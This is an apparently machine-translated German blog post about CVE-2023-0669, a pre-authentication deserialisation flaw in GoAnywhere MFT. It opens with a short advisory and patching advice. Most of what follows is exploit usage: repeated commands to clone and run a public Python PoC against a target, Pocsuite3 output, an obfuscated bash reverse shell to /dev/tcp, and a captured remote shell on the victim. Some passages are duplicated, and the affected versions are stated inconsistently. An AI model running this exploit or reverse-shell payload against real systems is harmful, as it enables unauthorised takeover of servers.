
GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Deserialisierungs-Sicherheitslücken Python RCE PoC(Machbarkeitsnachweis)
CVE-2023-0669 GoAnywhere MFT Deserialisierung – Je Yiuwais Blog
CVE-2023-0669 ist eine Deserialisierungsschwachstelle in GoAnywhere MFT. Aufgrund der Deserialisierung eines willkürlich vom Angreifer kontrollierten Objekts existiert im License Response Servlet eine vorauthentifizierte Command-Injection-Schwachstelle. Ein Angreifer kann diese Schwachstelle ausnutzen, um beliebigen Code auf dem betroffenen System auszuführen und dadurch die vollständige Kontrolle über das System zu erlangen. Die Schwachstelle betrifft Versionen vor 7.1.2, 7.1.2 nicht eingeschlossen.
CVE-2023-0669 ist eine Deserialisierungsschwachstelle in GoAnywhere MFT, die im License Response Servlet aufgrund einer vorauthentifizierten Command-Injection-Schwachstelle besteht. Ein Angreifer kann diese Schwachstelle ausnutzen, um beliebigen Code auf dem betroffenen System auszuführen, indem er ein vom Angreifer kontrolliertes Objekt deserialisiert. Die Schwachstelle betrifft Versionen vor 7.1.2.
Diese Schwachstelle stellt eine ernsthafte Bedrohung für die Sicherheit der Unternehmensdateiübertragungssoftware GoAnywhere MFT dar. Angreifer können sie ausnutzen, um sensible Daten zu stehlen, Daten zu manipulieren, Systeme zu kompromittieren usw. Daher müssen Benutzer rechtzeitig Maßnahmen ergreifen, um die Systemsicherheit zu schützen.
Das offizielle Sicherheitsbulletin wurde veröffentlicht und bietet erste Überprüfungsmethoden. Benutzer können in den Protokollen unter userdata/logs nach bestimmten Zeichenfolgen suchen, um festzustellen, ob ihr System von dieser Schwachstelle betroffen ist. Falls keine Patches installiert werden können, wird empfohlen, andere Sicherheitsmaßnahmen zu ergreifen, um das System zu schützen.
Zusammenfassend ist CVE-2023-0669 eine Deserialisierungsschwachstelle, die die Aufmerksamkeit der Benutzer erfordert. Benutzer sollten zeitnah auf die neueste Version aktualisieren und prüfen, ob ihr System von dieser Schwachstelle betroffen ist. Darüber hinaus wird empfohlen, das Sicherheitsmanagement von Unternehmenssoftware wie GoAnywhere MFT zu verstärken und mehrschichtige Sicherheitsmaßnahmen zu ergreifen, um die Systeme zu schützen.
Dieser Exploit ist ein Python-Skript, das die Schwachstelle CVE-2023-0669 in GoAnywhere MFT v6.7.9594 und früheren Versionen ausnutzt.
Diese Schwachstelle besteht aufgrund eines Sicherheitsproblems bei der Verarbeitung von verschlüsselten Bundle-Anfragen in GoAnywhere MFT. Ein Angreifer kann eine speziell gestaltete Anfrage senden und beliebigen Code auf dem Zielserver ausführen.
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <Zielserver-IP>
Dieser Exploit ist ein Python-Skript, das die Schwachstelle CVE-2023-0669 in GoAnywhere MFT v6.7.9594 und früheren Versionen ausnutzt.
Diese Schwachstelle besteht aufgrund eines Sicherheitsproblems bei der Verarbeitung von verschlüsselten Bundle-Anfragen in GoAnywhere MFT. Ein Angreifer kann eine speziell gestaltete Anfrage senden und beliebigen Code auf dem Zielserver ausführen.
git clone https://github.com/Avento/CVE-2023-0669.git
cd CVE-2023-0669
pip install requests cryptography
python CVE-2023-0669.py --host <Ziel-IP>
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url | poc-name | poc-id | component | version | status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1 port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
Autor: Je Yiuwai bearbeitet von xiaomi pad 6 pro